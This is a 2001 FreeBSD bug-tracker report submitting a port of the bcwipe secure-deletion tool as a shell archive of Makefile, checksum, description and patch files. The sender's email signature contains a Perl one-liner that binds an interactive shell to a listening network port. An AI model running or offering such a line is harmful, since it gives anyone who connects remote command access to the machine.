From crow@kapu.hu  Wed Jun  6 16:07:15 2001
Return-Path: <crow@kapu.hu>
Received: from mail.kapu.hu (mail.kapu.hu [195.70.32.236])
	by hub.freebsd.org (Postfix) with ESMTP id C10FB37B401
	for <FreeBSD-gnats-submit@freebsd.org>; Wed,  6 Jun 2001 16:07:14 -0700 (PDT)
	(envelope-from crow@kapu.hu)
Received: from crow (helo=localhost)
	by mail.kapu.hu with local-esmtp (Exim 3.14 #6)
	id 157mON-0003qb-00
	for FreeBSD-gnats-submit@freebsd.org; Thu, 07 Jun 2001 01:07:11 +0200
Message-Id: <Pine.LNX.4.10.10106070101340.11116-100000@mail.kapu.hu>
Date: Thu, 7 Jun 2001 01:07:11 +0200 (CEST)
From: Tamas Foldi <crow@kapu.hu>
To: FreeBSD-gnats-submit@freebsd.org
Subject: New Ports: bcwipe

>Number:         27917
>Category:       ports
>Synopsis:       New Ports: bcwipe
>Confidential:   no
>Severity:       non-critical
>Priority:       low
>Responsible:    freebsd-ports
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Wed Jun 06 16:10:03 PDT 2001
>Closed-Date:    Mon Jun 11 07:42:02 PDT 2001
>Last-Modified:  Mon Jun 11 07:42:59 PDT 2001
>Originator:     Crow
>Release:        FreeBSD 4.2-RELEASE i386
>Organization:
>Environment:
>Description:

new port description:

       bcwipe - securely erase data from magnetic and solid-state 
       memory.

       bcwipe Repeatedly overwrites special patterns to the files
       to be destroyed.  In normal mode, 34 patterns are used (of
       which 8 are random).  These patterns were  recommended  in
       article  from Peter Gutmann
       (http://www.cs.auckland.ac.nz/~pgut001/pubs/secure_del.html)
       entitled  "Secure  Deletion  of  Data  from   Magnetic and
       Solid-State Memory".  In quick mode,  U.S.  DoD(Department
       of  Defence) 5200.28 standard are used with 7 pass wiping.
       In custom mode U.S. DoD 5200.28  standard  are  used  with
       user defined number of passes.


Here come (/usr/ports/security/bcwipe/)bcwipe.shar
# This is a shell archive.  Save it in a file, remove anything before
# this line, and then unpack it by entering "sh file".  Note, it may
# create directories; files and directories will be owned by you and
# have default permissions.
#
# This archive contains:
#
#       .
#       ./Makefile
#       ./distinfo
#       ./pkg-comment
#       ./pkg-descr
#       ./pkg-plist
#       ./files
#       ./files/patch-aa
#
echo c - .
mkdir -p . > /dev/null 2>&1
echo x - ./Makefile
sed 's/^X//' >./Makefile << 'END-of-./Makefile'
X# New ports collection makefile for:   bcwipe
X# Date created:                                Mar 4, 2001
X# Whom:                                        crow
X#
X# $FreeBSD$
X#
X
XPORTNAME=      bcwipe
XPORTVERSION=   0.2
XPORTREVISION=  2
XCATEGORIES=    security
XMASTER_SITES=  http://www.jetico.com/linux/
XDISTNAME=      BCWipe-${PORTVERSION}-${PORTREVISION}
X
XMAINTAINER=    crow@nektor.hu
X
XWRKSRC=         ${WRKDIR}/${PORTNAME}-${PORTVERSION}-${PORTREVISION}
X
XMAN1=          bcwipe.1
X
X.include <bsd.port.mk>
END-of-./Makefile
echo x - ./distinfo
sed 's/^X//' >./distinfo << 'END-of-./distinfo'
XMD5 (BCWipe-0.2-2.tar.gz) = dd5c345a1e79ed30009126fa4b035bd2
END-of-./distinfo
echo x - ./pkg-comment
sed 's/^X//' >./pkg-comment << 'END-of-./pkg-comment'
XBCWipe securely erase data from magnetic and solid-state memory
END-of-./pkg-comment
echo x - ./pkg-descr
sed 's/^X//' >./pkg-descr << 'END-of-./pkg-descr'
Xbcwipe Repeatedly overwrites special patterns to the files
Xto be destroyed.  In normal mode, 34 patterns are used (of
Xwhich 8 are random).
XWWW: http://www.jetico.com
END-of-./pkg-descr
echo x - ./pkg-plist
sed 's/^X//' >./pkg-plist << 'END-of-./pkg-plist'
Xbin/bcwipe
END-of-./pkg-plist
echo c - ./files
mkdir -p ./files > /dev/null 2>&1
echo x - ./files/patch-aa
sed 's/^X//' >./files/patch-aa << 'END-of-./files/patch-aa'
X--- Makefile.orig      Thu Dec  7 19:04:06 2000
X+++ Makefile   Sun Dec 31 15:22:09 2000
X13c13
X< root=/
X---
X> PREFIX=/usr/local
X22,23c22,23
X<      $(INSTALL) -m 644 bcwipe.1      $(root)/usr/man/man1/
X<      $(INSTALL) -o root -m 755 -s bcwipe   $(root)/usr/bin/
X---
X>      $(INSTALL) -m 644 bcwipe.1      $(PREFIX)/man/man1/
X>      $(INSTALL) -o root -m 755 -s bcwipe   $(PREFIX)/bin/
END-of-./files/patch-aa
exit
---End of bcwipe.shar---

Best regards,
Foldi Tamas

--
perl -MIO::Socket -e'$s=IO::Socket::INET->new(LocalPort=>6666,Listen=>8);$c=
$s->accept;$n=$c->fileno;open STDIN,"<&$n";open STDOUT,"<&$n";exec"/bin/sh -i"'

>How-To-Repeat:
>Fix:
>Release-Note:
>Audit-Trail:
State-Changed-From-To: open->closed 
State-Changed-By: markp 
State-Changed-When: Mon Jun 11 07:42:02 PDT 2001 
State-Changed-Why:  
Obsoleted by PR 27993 

http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27917 
>Unformatted:
